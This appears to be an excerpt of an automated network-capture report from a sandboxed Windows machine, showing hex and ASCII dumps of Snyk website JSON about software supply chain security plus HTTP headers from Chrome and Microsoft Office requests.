                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC15730INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 73 6a 68 6e 4d 57 68 38 66 59 39 65 42 52 39 63 67 6c 77 30 6d 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 34 54 31 38 3a 32 35 3a 34 33 2e 36 36 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5sjhnMWh8fY9eBR9cglw0m","type":"Entry","createdAt":"2022-11-04T18:25:43.667Z","updatedAt":"2023-09-23T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC8858INData Raw: 2d 6d 65 64 69 61 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 4b 6e 6f 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 70 6f 73 74 75 72 65 20 6f 66 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 70 61 63 6b 61 67 65 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 2f 2f 73 6e 79 6b 2e 69 6f 2f 61 64 76 69 73 6f 72 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: -media","headline":"Know the security posture of open source packages","description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"","nodeType":"text"},{"data":{"uri":"https://snyk.io/advisor/"},"content":[{"data":{},"marks":[
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 55 6f 45 42 73 53 7a 31 66 43 6f 48 66 44 53 68 71 67 44 74 45 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 31 54 32 30 3a 32 37 3a 34 37 2e 33 38 33 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54 32 32 3a 33 34 3a 31 34 2e 34 33 38 5a 22 2c 22 65 6e 76
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000:[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4UoEBsSz1fCoHfDShqgDtE","type":"Entry","createdAt":"2023-06-01T20:27:47.383Z","updatedAt":"2024-07-18T22:34:14.438Z","env
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC8204INData Raw: 61 6e 64 20 68 6f 77 20 79 6f 75 20 63 61 6e 20 73 65 63 75 72 65 20 79 6f 75 72 20 73 75 70 70 6c 79 20 63 68 61 69 6e 73 20 77 69 74 68 20 53 6e 79 6b 2e 22 2c 22 6a 75 6d 70 4c 69 6e 6b 73 22 3a 5b 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 69 62 43 30 52 77 30 54 56 78 6b 69 46 4f 54 38 48 55 67 30 30 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 35 2d 32 36 54 31 30 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: and how you can secure your supply chains with Snyk.","jumpLinks":[{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4ibC0Rw0TVxkiFOT8HUg00","type":"Entry","createdAt":"2023-05-26T10:
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 76 65 20 61 70 70 72 6f 61 63 68 20 74 6f 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 20 69 6e 74 65 67 72 69 74 79 20 61 6e 64 20 63 6f 6e 66 69 64 65 6e 74 69 61 6c 69 74 79 20 6f 66 20 73 6f 66 74 77 61 72 65 20 74 68 72 6f 75 67 68 6f 75 74 20 69 74 73 20 65 6e 74 69 72 65 20 6c 69 66 65 63 79 63 6c 65 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 61 6e 63 68 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ve approach to protecting the integrity and confidentiality of software throughout its entire lifecycle.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"","nodeType":"text"},{"data":{"uri":"ancho
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12INData Raw: 2c 20 61 6c 73 6f 20 6b 6e 6f 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: , also kno
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 77 6e 20 61 73 20 74 79 70 6f 73 71 75 61 74 74 69 6e 67 20 6f 72 20 62 72 61 6e 64 6a 61 63 6b 69 6e 67 2e 20 44 65 76 65 6c 6f 70 65 72 73 20 63 61 6e 20 61 63 63 69 64 65 6e 74 61 6c 6c 79 20 75 70 64 61 74 65 20 6f 72 20 69 6e 73 74 61 6c 6c 20 6d 61 6c 69 63 69 6f 75 73 20 76 65 72 73 69 6f 6e 73 20 6f 66 20 70 61 63 6b 61 67 65 73 2c 20 63 6f 6d 70 72 6f 6d 69 73 69 6e 67 20 74 68 65 69 72 20 73 79 73 74 65 6d 73 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 72 65 6e 64 65 72 51 75 65 73 74 69 6f 6e 41 73 22 3a 22 68 32 22 2c 22 61 6e 63 68 6f 72 49 64
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000wn as typosquatting or brandjacking. Developers can accidentally update or install malicious versions of packages, compromising their systems.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"renderQuestionAs":"h2","anchorId
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12INData Raw: 74 68 65 73 65 20 70 61 63 6b 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: these pack
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 61 67 65 73 2e 20 48 6f 77 65 76 65 72 2c 20 74 68 69 73 20 69 73 20 6e 6f 74 20 61 20 73 75 62 73 74 69 74 75 74 65 20 66 6f 72 20 6d 61 6c 77 61 72 65 20 64 65 74 65 63 74 69 6f 6e 2e c2 a0 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 61 6e 63 68 6f 72 3a 6e 65 78 74 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000ages. However, this is not a substitute for malware detection.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"marks":[],"value":"","nodeType":"text"},{"data":{"uri":"anchor:next"},"content":[{"data":{},"marks":[
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:13 UTC8204INData Raw: 79 20 62 65 74 77 65 65 6e 20 74 68 65 20 46 65 64 65 72 61 6c 20 47 6f 76 65 72 6e 6d 65 6e 74 20 61 6e 64 20 74 68 65 20 70 72 69 76 61 74 65 20 73 65 63 74 6f 72 2c 20 61 6e 64 20 74 69 67 68 74 65 72 20 73 65 63 75 72 69 74 79 20 6f 66 20 74 68 65 20 73 6f 66 74 77 61 72 65 20 70 75 72 63 68 61 73 65 64 20 62 79 20 74 68 65 20 46 65 64 65 72 61 6c 20 47 6f 76 65 72 6e 6d 65 6e 74 2e 20 54 68 65 20 72 69 73 6b 20 70 6f 73 65 64 20 62 79 20 73 6f 66 74 77 61 72 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 61 74 74 61 63 6b 73 20 69 73 20 63 6c 65 61 72 6c 79 20 61 72 74 69 63 75 6c 61 74 65 64 20 61 74 20 74 68 65 20 62 65 67 69 6e 6e 69 6e 67 20 6f 66 20 73 65 63 74 69 6f 6e 20 34 20 6f 66 20 74 68 65 20 6f 72 64 65 72 3a 22 2c 22 6e 6f 64 65 54 79 70
                                                                                                                                                                                                                                                                                                              Data Ascii: y between the Federal Government and the private sector, and tighter security of the software purchased by the Federal Government. The risk posed by software supply chain attacks is clearly articulated at the beginning of section 4 of the order:","nodeTyp


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              98192.168.2.54986023.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC418OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform.json?slug=platform HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"t856ukcshc251q"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::x72cm-1729799351731-bd0456f402fb
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799351.10952b1
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC15762INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 63 6b 6b 32 7a 6b 36 6f 53 50 34 78 31 47 43 68 34 78 38 4f 48 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 31 38 3a 33 37 3a 35 38 2e 36 38 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3ckk2zk6oSP4x1GCh4x8OH","type":"Entry","createdAt":"2022-11-09T18:37:58.686Z","updatedAt":"2023-09-23T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC8826INData Raw: 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 31 31 54 52 36 78 35 4d 4b 6c 74 44 45 38 65 46 6b 4d 70 47 74 33 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 31 39 3a 30 31 3a 33 37 2e 36 35 34 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54 32 32 3a 33 31 3a 30 36 2e 30 31 32 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65
                                                                                                                                                                                                                                                                                                              Data Ascii: oncepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"11TR6x5MKltDE8eFkMpGt3","type":"Entry","createdAt":"2022-11-09T19:01:37.654Z","updatedAt":"2024-07-18T22:31:06.012Z","environment":{"sys":{"id":"master","type
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 61 6e 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 6f 66 20 73 65 63 75 72 69 74 79 20 70 72 61 63 74 69 63 65 73 20 69 6e 74 6f 20 61 20 44 65 76 4f 70 73 20 73 6f 66 74 77 61 72 65 20 64 65 6c 69 76 65 72 79 20 6d 6f 64 65 6c 2e 22 2c 22 6f 67 54 79 70 65 22 3a 22 61 72 74 69 63 6c 65 22 7d 7d 2c 22 70 75 62 6c 69 73 68 44 61 74 65 22 3a 22 32 30 32 30 2d 30 33 2d 31 39 54 31 37 3a 30 32 3a 35 39 2b 30 30 3a 30 30 22 2c 22 65 78 63 65 72 70 74 22 3a 22 44 65 76 53 65 63 4f 70 73 20 72 65 66 65 72 73 20 74 6f 20 74 68 65 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 6f 66 20 73 65 63 75 72 69 74 79 20 70 72 61 63 74 69 63 65 73 20 69 6e 74 6f 20 61 20 44 65 76 4f 70 73 20 73 6f 66 74 77 61 72 65 20 64 65 6c 69 76 65 72 79 20 6d 6f 64 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000an integration of security practices into a DevOps software delivery model.","ogType":"article"}},"publishDate":"2020-03-19T17:02:59+00:00","excerpt":"DevSecOps refers to the integration of security practices into a DevOps software delivery mode
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC8204INData Raw: 6f 6e 74 65 6e 74 22 3a 5b 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 2c 22 76 61 6c 75 65 22 3a 22 53 6e 79 6b 2f 50 75 70 70 65 74 20 32 30 32 30 20 44 65 76 53 65 63 4f 70 73 20 49 6e 73 69 67 68 74 73 20 52 65 70 6f 72 74 22 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 64 61 74 61 22 3a 7b 7d 7d 5d 7d 2c 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 2c 22 76 61 6c 75 65 22 3a 22 20 66 6f 75 6e 64 20 74 68 69 73 20 74 6f 20 62 65 20 74 68 65 20 63 61 73 65 20 69 6e 20 6d 61 74 75 72 65 20 44 65 76 53 65 63 4f 70 73 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 22 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 64 61 74 61 22 3a 7b 7d 7d 5d 7d 5d 7d 2c 7b 22 6e 6f 64 65 54 79 70 65 22 3a 22 6c 69 73 74 2d 69 74 65 6d 22 2c 22 64 61 74 61 22 3a 7b 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: ontent":[{"nodeType":"text","value":"Snyk/Puppet 2020 DevSecOps Insights Report","marks":[],"data":{}}]},{"nodeType":"text","value":" found this to be the case in mature DevSecOps organizations.","marks":[],"data":{}}]}]},{"nodeType":"list-item","data":{}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 22 3a 22 44 75 72 69 6e 67 20 74 68 65 20 70 6c 61 6e 6e 69 6e 67 20 70 72 6f 63 65 73 73 2c 20 70 61 72 74 69 63 75 6c 61 72 6c 79 20 61 73 20 69 74 20 72 65 6c 61 74 65 73 20 74 6f 20 69 6e 66 72 61 73 74 72 75 63 74 75 72 65 2c 20 73 65 63 75 72 69 74 79 20 65 6e 67 69 6e 65 65 72 73 20 73 68 6f 75 6c 64 20 62 65 20 69 6e 76 6f 6c 76 65 64 20 69 6e 20 64 69 73 63 75 73 73 69 6f 6e 73 2c 20 65 6d 70 6f 77 65 72 65 64 20 74 6f 20 70 75 73 68 20 62 61 63 6b 20 6f 6e 20 70 6f 6f 72 2f 69 6e 73 65 63 75 72 65 20 63 68 6f 69 63 65 73 2c 20 62 75 74 20 6b 6e 6f 77 6c 65 64 67 65 61 62 6c 65 20 65 6e 6f 75 67 68 20 74 6f 20 6f 66 66 65 72 20 61 6c 74 65 72 6e 61 74 69 76 65 73 2e 20 4f 66 74 65 6e 74 69 6d 65 73 2c 20 6f 76 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000e":"During the planning process, particularly as it relates to infrastructure, security engineers should be involved in discussions, empowered to push back on poor/insecure choices, but knowledgeable enough to offer alternatives. Oftentimes, ove
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12INData Raw: 74 54 79 70 65 22 3a 7b 22 73 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: tType":{"s
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC11339INData Raw: 30 30 30 30 32 43 33 46 0d 0a 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6f 72 67 61 6e 69 73 6d 46 6f 6f 74 65 72 43 74 61 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 47 65 74 20 73 74 61 72 74 65 64 20 66 6f 72 20 66 72 65 65 5c 22 20 2d 20 44 65 66 61 75 6c 74 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 53 74 61 72 74 20 73 65 63 75 72 69 6e 67 20 41 49 2d 67 65 6e 65 72 61 74 65 64 20 63 6f 64 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00002C3Fys":{"type":"Link","linkType":"ContentType","id":"organismFooterCta"}},"locale":"en-US"},"fields":{"internalName":"\"Get started for free\" - Default","headline":"Start securing AI-generated code","description":{"data":{},"content":[{"data":{},"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 35 41 33 43 0d 0a 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 73 65 63 75 72 69 74 79 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 68 69 65 6c 64 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 43 6e 55 31 75 78 59 4a 52 70 73 55 58 46 33 35 51 42 62 6d 68 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6f 66 74 77 61 72 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 73 65 63 75 72 69 74 79 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 69 74 69 67 61 74 65 20 73 75 70 70 6c 79 20 63 68 61 69 6e 20 72 69 73 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: 00005A3C/application-security/","appearance":{"navItem":{"icon":"shield"}}},{"sys":{"id":"3CnU1uxYJRpsUXF35QBbmh","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Software supply chain security","description":"Mitigate supply chain risk
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC6728INData Raw: 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 46 6f 72 6d 44 65 73 63 72 69 70 74 69 6f 6e 22 7d 2c 22 74 69 74 6c 65 22 3a 22 54 68 65 20 44 61 69 6c 79 20 56 75 6c 6e 22 2c 22 66 6f 72 6d 49 64 22 3a 22 31 30 35 31 22 2c 22 66 6f 72 6d 49 64 53 61 6e 64 62 6f 78 22 3a 22 31 30 35 31 22 2c 22 73 74 61 79 4f 6e 50 61 67 65 22 3a 74 72 75 65 2c 22 65 6e 66 6f 72 63 65 42 75 73 69 6e 65 73 73 45 6d 61 69 6c 22 3a 6e 75 6c 6c 2c 22 72 65 64 69 72 65 63 74 55 72 6c 22 3a 6e 75 6c 6c 2c 22 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 22 3a 22 54 68 61 6e 6b 20 79 6f 75 21 20 59 6f 75 20 61 72 65 20 6e 6f 77 20 73 75 62 73 63 72 69 62 65 64 22 2c 22 69 73 49 6e 6c 69 6e 65 64 22 3a 74 72 75 65 7d 2c 22 66 6f 6f 74
                                                                                                                                                                                                                                                                                                              Data Ascii: document"},"__typename":"ContentFormDescription"},"title":"The Daily Vuln","formId":"1051","formIdSandbox":"1051","stayOnPage":true,"enforceBusinessEmail":null,"redirectUrl":null,"successMessage":"Thank you! You are now subscribed","isInlined":true},"foot
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              99192.168.2.54986213.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 3edebaab-e01e-0033-21c8-214695000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194911Z-16849878b786lft2mu9uftf3y400000000v0000000000un7
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
